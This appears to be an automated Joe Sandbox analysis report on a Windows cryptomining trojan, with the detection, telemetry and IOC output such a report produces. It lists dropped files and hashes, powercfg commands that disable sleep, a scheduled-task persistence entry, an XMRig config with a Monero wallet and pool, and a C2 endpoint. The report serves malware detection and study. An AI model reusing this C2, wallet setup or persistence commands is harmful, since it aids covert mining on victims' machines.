              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}stem[
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 68325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6},q
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Queries volume information: C:\Users\user\Desktop\ft1i6jvAdD.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Queries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Queries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Queries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Queries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
              MITRE ATT&CK Matrix

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 1 Masquerading | OS Credential Dumping | 331 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 212 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 212 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 33 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              Behavior Graph ID: 1411192 Sample: ft1i6jvAdD.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100
              Contacted hosts: xmr-eu1.nanopool.org; cf-protected-l7.com (134.255.231.136, ports 49710, 49723, 49726, ACTIVE-SERVERSactive-serverscomDE, Germany); 54.37.137.114 (port 10300, OVHFR, France); 162.19.224.121 (port 10300, CENTURYLINK-US-LEGACY-QWESTUS, United States)
              Dropped files: C:\Users\user\AppData\Local\...\ghghghg.exe (PE32+); C:\Users\user\AppData\...\haaczrnyavrj.sys (PE32+); C:\Users\user\AppData\Roaming\...\fgfdgd.exe (PE32+)

              Source | Detection | Scanner | Label | Link
              ft1i6jvAdD.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
              ft1i6jvAdD.exe | 100% | Joe Sandbox ML | |
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | 5% | ReversingLabs | |
              C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://cf-protected-l7.com/api/endpoint.phpU | 0% | Avira URL Cloud | safe |
              http://cf-protected-l7.com/api/endpoint.phpe$U | 0% | Avira URL Cloud | safe |
              http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu= | 0% | Avira URL Cloud | safe |
              http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokr | 0% | Avira URL Cloud | safe |
              http://cf-protected-l7.com/api/endpoint.php | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              cf-protected-l7.com | 134.255.231.136 | true | true | | unknown
              xmr-eu1.nanopool.org | 141.94.23.83 | true | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              http://cf-protected-l7.com/api/endpoint.php | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://cf-protected-l7.com/api/endpoint.phpe$U | explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://cf-protected-l7.com/api/endpoint.phpU | explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://cf-protected-l7.com/api/endpoint.phptmsnnprpbvnfzokr | explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://cf-protected-l7.com/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu= | explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              134.255.231.136 | cf-protected-l7.com | Germany | | 197071 | ACTIVE-SERVERSactive-serverscomDE | true
              162.19.224.121 | unknown | United States | | 209 | CENTURYLINK-US-LEGACY-QWESTUS | true
              54.37.137.114 | unknown | France | | 16276 | OVHFR | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1411192
                  Start date and time:2024-03-18 17:47:15 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 27s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:83
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ft1i6jvAdD.exe
                  renamed because original name is a hash value
                  Original Sample Name:b03c2d7df7eabc44f36397cb66ac3e77.exe
                  Detection:MAL
                  Classification:mal100.spyw.evad.mine.winEXE@117/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 126
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                  • Excluded IPs from analysis (whitelisted): 40.127.169.103, 23.206.121.21, 23.206.121.58, 23.206.121.13, 23.206.121.22, 23.206.121.53, 23.206.121.20, 23.206.121.46, 13.85.23.206
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Execution Graph export aborted for target fgfdgd.exe, PID 1668 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 1828 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 3760 because it is empty
                  • Execution Graph export aborted for target fgfdgd.exe, PID 6784 because it is empty
                  • Execution Graph export aborted for target ft1i6jvAdD.exe, PID 7032 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 1716 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 1800 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 6212 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 6244 because it is empty
                  • Execution Graph export aborted for target ghghghg.exe, PID 7132 because it is empty
• Not all processes were analyzed; report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: ft1i6jvAdD.exe
Time | Type | Description
17:48:12 | API Interceptor | 5x Sleep call for process: ghghghg.exe modified
17:48:13 | Task Scheduler | Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe"
                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
xmr-eu1.nanopool.org | vS3C07uH19.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Xmrig | 51.255.34.118
xmr-eu1.nanopool.org | kGsmMpk9kX.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Xmrig | 51.68.190.80
xmr-eu1.nanopool.org | huUaO72kiE.exe | malicious | Xmrig, zgRAT | 51.15.58.224
xmr-eu1.nanopool.org | O1GEDfxZO0.exe | malicious | zgRAT | 212.47.253.124
xmr-eu1.nanopool.org | obaTzlGNzi.exe | malicious | Xmrig, zgRAT | 163.172.154.142
xmr-eu1.nanopool.org | 8EbwkHzF0i.exe | malicious | Xmrig, zgRAT | 163.172.154.142
xmr-eu1.nanopool.org | qZTW6BQiPB.exe | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT | 163.172.154.142
xmr-eu1.nanopool.org | y2SXPxk5wh.exe | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT | 163.172.154.142
xmr-eu1.nanopool.org | gWASDCKtct.exe | malicious | Glupteba, LummaC Stealer, RedLine, SmokeLoader, XWorm, Xmrig, zgRAT | 51.68.190.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CENTURYLINK-US-LEGACY-QWESTUS | 5dm0sjynSD.elf | malicious | Unknown | 65.130.12.233
CENTURYLINK-US-LEGACY-QWESTUS | bzVCvtoyIt.elf | malicious | Mirai | 162.19.122.107
CENTURYLINK-US-LEGACY-QWESTUS | 7p4wRYn0OK.elf | malicious | Mirai | 146.206.160.239
CENTURYLINK-US-LEGACY-QWESTUS | FoDoFx0t5a.elf | malicious | Mirai | 67.5.191.142
CENTURYLINK-US-LEGACY-QWESTUS | LhypGRxeG7.elf | malicious | Unknown | 97.119.231.192
CENTURYLINK-US-LEGACY-QWESTUS | uPG4ESUjG9.elf | malicious | Mirai | 67.129.210.111
CENTURYLINK-US-LEGACY-QWESTUS | WdwgE9p1kA.elf | malicious | Mirai | 75.120.122.12
CENTURYLINK-US-LEGACY-QWESTUS | ZSlkj38Qce.elf | malicious | Mirai | 71.49.186.253
CENTURYLINK-US-LEGACY-QWESTUS | kt46zhUGCl.elf | malicious | Mirai | 184.97.138.118
CENTURYLINK-US-LEGACY-QWESTUS | KtvCSGVXFf.elf | malicious | Mirai | 71.52.208.252
ACTIVE-SERVERSactive-serverscomDE | huhu.mips.elf | malicious | Mirai, Okiru | 95.156.228.183
ACTIVE-SERVERSactive-serverscomDE | 1B8943B2CCEA3EE9E464B5865711DB721BAE33CA03646.exe | malicious | BazaLoader, SmokeLoader | 134.255.232.95
ACTIVE-SERVERSactive-serverscomDE | Summaryform_XsssmAVjTv.wsf | malicious | AsyncRAT, zgRAT | 134.255.225.46
ACTIVE-SERVERSactive-serverscomDE | http://vps-zap756882-1.zap-srv.com | malicious | Unknown | 134.255.234.208
ACTIVE-SERVERSactive-serverscomDE | 3fB3EuUEe7.exe | malicious | Quasar | 134.255.254.225
ACTIVE-SERVERSactive-serverscomDE | dl2.exe | malicious | Unknown | 31.214.240.203
ACTIVE-SERVERSactive-serverscomDE | mpsl.elf | malicious | Mirai | 95.156.228.199
ACTIVE-SERVERSactive-serverscomDE | KY40Vey3Ml.elf | malicious | Mirai | 95.156.228.196
ACTIVE-SERVERSactive-serverscomDE | file.exe | malicious | Quasar | 134.255.254.134
ACTIVE-SERVERSactive-serverscomDE | dulcifiesSootyi.js | malicious | Unknown | 134.255.220.213
OVHFR | Bagskrmes.exe | malicious | AgentTesla, GuLoader | 46.105.60.70
OVHFR | 8B5NOWiWn8.elf | malicious | Unknown | 51.255.248.67
OVHFR | 7InjeWQVHC.elf | malicious | Unknown | 37.59.96.132
OVHFR | TRANSFERENCIA.exe | malicious | AgentTesla | 178.33.114.182
OVHFR | xdd6BRIg0O.exe | malicious | PureLog Stealer, RedLine, Snake Keylogger | 51.38.247.67
OVHFR | WdwgE9p1kA.elf | malicious | Mirai | 192.99.154.26
OVHFR | ry3HbSIIPt.elf | malicious | Mirai | 192.99.207.204
OVHFR | PPIQY37OuD.elf | malicious | Unknown | 51.222.237.219
OVHFR | Vindegade.exe | malicious | AgentTesla, GuLoader | 46.105.60.70
OVHFR | 1PfkUPbqjw.elf | malicious | Mirai | 198.50.131.212
                  No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | Setup.exe | malicious | LummaC, PureLog Stealer, Xmrig
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | SU8Kw3AYnG.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | AQrfgZUJcl.exe | malicious | Xmrig
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | 6oD5NFvQdZ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | 6oD5NFvQdZ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | eeZJsTqr0S.exe | malicious | PureLog Stealer, RedLine, zgRAT
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip | malicious | Xmrig
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | jeNQRsRgBe.exe | malicious | Xmrig
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | RemiTool v2.exe | malicious | Xmrig
C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys | SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe | malicious | Xmrig
                                      Process:C:\Users\user\Desktop\ft1i6jvAdD.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5191680
                                      Entropy (8bit):6.515611126076874
                                      Encrypted:false
                                      SSDEEP:98304:jJDFg13oa/r8FiubBAzKkEUous3o6CUF5T2/TGhzmZTU:Xgu/subSzKlJe/ULQ2q
                                      MD5:D3CD8232D7097DC4953B61B86AFD7FD2
                                      SHA1:E1733674BC7C3C7AA5B156B66049DBFD3191BD11
                                      SHA-256:6FD8206D1F38AC41C23A6C9DEAD21EB3FF7421200F6185EDF63C70DA8FBB398C
                                      SHA-512:2404A989B0D400D621056E7326D465C6A5646CAC175920D0CB9BC2E7C0AA6D5B08996C42DB963C2B5E5C7D14814616986D985A15F3EA1D84F4CA23720FF1E95C
                                      Malicious:true
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......^....N.....@..........@..............................O...........`.................................................`...<............PO.t.............O.x............................p..(....t..8...............X............................text...F].......^.................. ..`.rdata.......p.......b..............@..@.data.....N.......N.................@....pdata..t....PO......0O.............@..@.00cfg.......`O......2O.............@..@.tls.........pO......4O.............@....reloc..x.....O......6O.............@..B................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Joe Sandbox View:
• Filename: Setup.exe, Detection: malicious
• Filename: SU8Kw3AYnG.exe, Detection: malicious
• Filename: AQrfgZUJcl.exe, Detection: malicious
• Filename: 6oD5NFvQdZ.exe, Detection: malicious
• Filename: 6oD5NFvQdZ.exe, Detection: malicious
• Filename: eeZJsTqr0S.exe, Detection: malicious
• Filename: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip, Detection: malicious
• Filename: jeNQRsRgBe.exe, Detection: malicious
• Filename: RemiTool v2.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe, Detection: malicious
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):5227008
                                      Entropy (8bit):7.999295125679926
                                      Encrypted:true
                                      SSDEEP:98304:22gWGh4M2YYF05TqTcAJ5ubzxFAvJWJkC0dLM658jmpMJAxmEjmiFDzQbTMo7KlJ:22gWGh4M2nF0pqTcA/gFonCu0SmEDFD5
                                      MD5:B03C2D7DF7EABC44F36397CB66AC3E77
                                      SHA1:486F521D16D96878A74FF9212CF2DA5B184E0430
                                      SHA-256:4489FF33E7A91C7485A1C1DD8A6102868E385F74FD8B5DBDBF4B505BBE9193B3
                                      SHA-512:5CFFC7A0BA01E5DB793A62A3FC1DC2454CBD5B768F66959ADAC11E1523958BC48EF4C1DD5FF074988C04B6269853671AB480074A117D30184631D9936C154051
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 55%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..e..........".......O.............. ....@...... ........................P...........@...........................................................O.............................................................................................. ..H............text...6.O.. ....O................. ..`.rsrc.........O.......O.............@..@........................................H........K..LM......g...P....?O...........................................(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*>+......*si...+...(i...*..(i...*..(i...*..(i...*..(i...*..(i...*..(i...*r.~.... ....(r...}.....(i...*...b.....+.+.*(7...+.(w...+.....0..@.......8....~.... ....8....~.... ....8....(U...sj....ok.....~.... "...(r...~.... ....(r...(U...ol.....~.... C...(r... ....om.........(7...~.... `...(r...~.... ....(r...(U...(n.....oo.
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.999295125679926
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:ft1i6jvAdD.exe
                                      File size:5'227'008 bytes
                                      MD5:b03c2d7df7eabc44f36397cb66ac3e77
                                      SHA1:486f521d16d96878a74ff9212cf2da5b184e0430
                                      SHA256:4489ff33e7a91c7485a1c1dd8a6102868e385f74fd8b5dbdbf4b505bbe9193b3
                                      SHA512:5cffc7a0ba01e5db793a62a3fc1dc2454cbd5b768f66959adac11e1523958bc48ef4c1dd5ff074988c04b6269853671ab480074a117d30184631d9936c154051
                                      SSDEEP:98304:22gWGh4M2YYF05TqTcAJ5ubzxFAvJWJkC0dLM658jmpMJAxmEjmiFDzQbTMo7KlJ:22gWGh4M2nF0pqTcA/gFonCu0SmEDFD5
                                      TLSH:803633982FA0C7ECC68D04B482536A555330F4E165A0EF4CE9168D8E4D527FDE3ABBD8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..e..........".......O.............. ....@...... ........................P...........@................................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x400000
                                      Entrypoint Section:
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x65F38237 [Thu Mar 14 23:03:19 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:
                                      Instruction
                                      dec ebp
                                      pop edx
                                      nop
                                      add byte ptr [ebx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4fe000 | 0x4be | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x4fb836 | 0x4fba00 | dd58249a90b9d4a9dc3f21476c0a8f8a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
